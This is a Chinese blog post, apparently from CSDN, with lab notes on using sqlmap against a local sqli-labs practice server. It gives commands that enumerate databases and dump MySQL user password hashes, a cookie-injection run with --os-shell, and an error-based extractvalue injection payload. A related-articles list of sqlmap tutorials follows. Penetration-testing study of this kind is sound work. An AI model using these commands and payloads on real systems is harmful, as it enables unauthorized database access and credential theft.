sqlmap

已于 2023-07-30 20:52:05 修改
阅读量170 收藏 1
点赞数 1
分类专栏: 笔记 文章标签: 安全 网络安全 web安全
于 2021-04-09 19:33:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45322343/article/details/115557866
版权

Sqlmap自动化测试
实验网址http://192.168.19.130/sqli-labs/Less-8/?id=1
Sqlmap:自动化测试sql注入工具
sqlmap -u ‘url’
–dbs 查询库名
-D 指定库
–table 查询表
-T 指定表
–column 查询字段
-C 指定字段
–dumps 读取数据

sqlmap: --batch自动全部选择yes level扫描等级

3.sqlmap -r “/root/桌面/sql-20.txt” --batch --cookie=“uname=admin” --level 3

cookie注入提权:
1.先用burp抓包有cookie注入
2。保存为文件
3.sqlmap -r “/root/桌面/sql-20.txt” --cookie=“id=1” --level 3
4.sqlmap -r “/root/桌面/sql-20.txt” --cookie=“id=1” --level 3 --os-shell

less-18-ua头注入
payload:
'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and ’

先写出所有指令,具体步骤紧跟后面附图
1.sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”
2.sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”—dbs
3.sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D information_schema --column
4.
1sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”
在这里插入图片描述

//测出布尔型盲注和时间型盲注
2 sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”—dbs //列出所有数据库
在这里插入图片描述

3 sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D mysql –-tables//查询mysql中表
在这里插入图片描述

4 sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D mysql –T user –-columns//查询user表中的字段
在这里插入图片描述

sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D mysql –T user –C user –-dump//查询user字段中的数据
在这里插入图片描述

sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D mysql –T user –C password –-dump//查询password字段中的数据
在这里插入图片描述

表中password数据就出来了 当然这是加密的百度解密就行

emptybottle.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap-master
01-04
SQLMap:渗透测试中的神器》 SQLMap是一款开源的自动化SQL注入工具,主要用于检测网站应用程序是否存在SQL注入漏洞,并能够进一步利用这些漏洞进行数据库的控制和数据的提取。标题"sqlmap-master"暗示了我们讨论...
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap是一款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它可以帮助安全研究人员或渗透测试者发现并利用网站数据库的安全弱点。这个压缩包`sqlmapproject-sqlmap-1230e57`很可能包含了SQLmap的源...
漏洞报告撰写之道:如何写专业、高效的漏洞报告
最新发布
网络安全
02-27 1443
漏洞赏金猎人的工作不仅仅是寻找漏洞;它还向组织的安全团队解释它们。如果您提供一份写得很好的报告,您将帮助与您合作的团队重现漏洞利用,将其分配给适当的内部工程团队,并更快地解决问题。 商业化的报告模板是一个不错的形式,但比它更色的是,观察与思考。 从工作流程的角度来说,漏洞管理与账面核对也非常重要。一个组织如果长时间接收到报告,那么面临到的问题一定是一些个性化的。比如,漏洞管理过程中,命名的规范直接导致这个能否一眼看是否重复提交,是否易于管理与记账,是否存在数据之间的关联与匹配性。
Sql-map测试报告
vsdfbhsdhsdfh的博客
09-30 764
sqlmap
sqlmap进行sql注入测试的报告
weixin_35755562的博客
01-04 151
sqlmap是一款开源的SQL注入自动化工具。它可以帮助渗透测试人员自动化地扫描Web应用程序并检测SQL注入漏洞。 在进行SQL注入测试时,sqlmap会尝试将恶意SQL语句注入到Web应用程序的输入字段中,并检测程序是否可以执行这些语句。如果程序可以执行恶意语句,则说明存在SQL注入漏洞。 在测试结束后,sqlmap会生成一份报告,其中包含测试结果、发现的漏洞信息以及执行的SQL注入攻击。这份...
Fiddler+sqlmap实现自动化sql注入测试输测试报告(渗透测试)
weixin_55393410的博客
04-15 5686
文章目录前言一、配置Fiddler自定义规则脚本二、使用步骤1.引入库2.读入数据总结 前言 提示:工具准备: python3.*+Fiddler+sqlmap+mysql(可选) 实现效果: 浏览器操作系统Fiddler将自动抓包接口数据存入.txt文件>运行python sqlmap 程序 >自动化sql注入扫描>将扫描结果写入mysql 一、配置Fiddler自定义规则脚本 打开fiddler 找到方法 【static function OnBeforeRequest(oSess
kali linux下sqlmap使用教程
龙卷风摧毁停车场
03-30 1万+
SQLMAP 有windows和linux两个版本使用,可跨系统进行操作,语法参数都相同,此处以kali linux为例进行操作 sqlmap --version 查看sqlmap版本 sqlmap -h 查看sqlmap帮助 sqlmap -hh 查看sqlmap高级帮助 使用sqlmap连接数据库 查看数据库banner信息 sqlmap -d "mysql://root:123456@47.208.229.216:3306/tiantianbao" -f --banner 查看数据库用户 sql
测试工具-sqlmap
weixin_42902126的博客
06-27 4302
sqlmap支持直连,通过以下命令来直连。 1、服务型数据库:mysql,oracle,sqlserver,postgresql等 服务型数据库(前提知道数据库用户名和密码): mysql数据库root账户默认不支持外链,参考文档:https://qa.1r1g.com/sf/ask/3435601921/ 2、文件型数据库:sqlite,access,firebird等 文件型数据库(前提知道数据库绝对路径): sqlmap获取目标 单一url探测 参数使用 -u 或 --url URL格式:http(s
SQLMAP Windows
02-23
SQLMAP是一款著名的自动化SQL注入工具,专用于检测和利用网站应用程序中的SQL注入漏洞。它可以在Windows操作系统上运行,为安全研究人员和渗透测试人员提供了一种高效且强大的手段来测试目标系统的安全性。 在...
sqlmap安装包
01-19
**SQLMap介绍** SQLMap是一款开源的自动化SQL注入工具,专为检测和利用SQL注入漏洞而设计。它能够帮助安全研究人员或渗透测试人员快速、准确地发现和利用目标系统中的SQL注入漏洞,从而提高测试效率。SQLMap的强大...
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入的渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获 取数据到访问底层文件系统和通过带外连接在操作系统上执行命令
SqlMap的使用
06-24
### SqlMap的使用详解 #### 一、SqlMap简介及工作原理 SqlMap是一款开源的渗透测试工具,用于自动化地检测并利用Web应用程序中的SQL注入漏洞。它支持多种类型的数据库,如MySQL、Oracle、PostgreSQL等,并能进行...
sqlmap注入总结
weixin_34321753的博客
08-22 1447
本实验是基于DVWA和sqli-labs的实验环境实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下。安装只要注意Wamp环境的数据库名和密码对应即可。sqlmap里涉及到的sql注入原理,请参考http://wt7315.blog.51cto.com/10319657/1828167,实验环境也是基于sqli-lab...
sqlmap默认输路径的设置
YQ的博客
04-10 1万+
SQLMap的默认输路径是在 C:/Users/用户名/.sqlmap/output/下的。 但是刚安装完sqlmap后C:/Users/用户名/ 文件下是不存在.sqlmap这个文件夹的,需要使用sqlmap扫描一下网站,程序才会建立该文件夹。 设置sqlmap的默认输路径很简单,执行如下命令: 在--output-dir后面输入想要导的文件路径。 这样程序执行之后就
sqlmap使用详解
nex1less的博客
10-19 1397
0x01 sqlmap简介 sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 0x02 sqlmap用法 转自: https://github.com/sql...
使用sqlmap检测sql注入漏洞
热门推荐
菜鸟、上路
08-21 10万+
一、 sql注入概述并安装sqlmap漏洞查看工具 1、 sql注入概述 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 它是利用现有应用程序,可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库。 比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴的,这类表...
sqlmap使用总结
buffedon的博客
06-11 574
sqlmap使用总结1. 基本用法2. 使用sqlmap探测waf并绕过3. python脚本绕过网站4. 伪造http referer头部探测风险等级5. 执行语句6. 从数据库读文件7. 上传文件到数据库 1. 基本用法 sqlmap -r http.txt #http.txt是我们抓取的http的请求包 sqlmap -r http.txt -p username #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测 sqlmap -u "
【渗透测试笔记】之【SQLMap
AA8j的博客
07-21 2502
SQL Map 五种漏洞检测技术 基于布尔的盲注检测 基于时间的盲注检测 基于错误的检测 基于UNION 联合查询的检测 基于堆叠查询的检测 GET sqlmap -u "http://192.168.2.101/mutillidae/index.php?page=user-info.php&username=a&password=a&user-info-php-submit-button=View+Account+Details" -p username -f -p:检查哪个
sqlmap使用_sqlmap从入门到精通第四章47使用EW代理导和导入MSSQL数据
weixin_39618169的博客
12-09 201
4.7 使用EW代理导和导入MSSQL数据一般的场景就是目标站点获取了webshell,然后数据库的IP地址不在目标站的本地,而且做了精准的访问控制,只允许目标站点的IP地址才能访问数据库,那么这个场景就适合通过代理的方式导和导入了4.7.1 设置代理1. 在独立的公网IP执行命令命令如下:ew -s rcsocks -l 1080 -e 3389上面的3389端口是独立公网IP地址...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值